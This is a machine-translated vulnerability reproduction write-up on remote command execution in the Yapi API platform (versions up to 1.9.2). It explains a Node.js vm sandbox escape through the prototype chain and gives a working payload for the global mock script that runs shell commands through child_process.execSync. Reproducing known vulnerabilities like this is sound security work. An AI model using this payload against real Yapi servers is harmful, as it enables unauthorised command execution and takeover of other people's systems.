Vulnerability recurrence ----- 34. Yapi remote command execution vulnerability

Yapi Official website address ：http://yapi.smart-xwork.cn/

YAPI brief introduction

YAPI It's efficient 、 Easy to use 、 Powerful API Management platform , Designed to develop 、 product 、 Testers provide more elegant interface management services , Provide basic project grouping , project management , Interface management function , Friendly interface documentation , be based on websocket The editing function and class of the multi person cooperation interface postman Testing tools , Let multiple people work together to improve development efficiency , And based on Mockjs, Simple to use and powerful .

Causes of loopholes

An attacker can register a user , And use Mock Function to realize remote command execution . The principle of command execution is Node.js adopt require('vm') To build a sandbox environment , The attacker can change the running context of the sandbox environment through the prototype chain , So as to achieve the effect of sandbox escape . adopt vm.runInNewContext("this.constructor.constructor('return process')()") You can get a process object .

Affects version ：Yapi <= 1.9.2

Loophole recurrence

1、 After registering the user , New projects

2、 Set up -> overall situation mock Add malicious code to the script .

const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockJson = process.mainModule.require("child_process").execSync("id;uname -a;pwd").toString()

3、 Add interface

4、 visit mock Address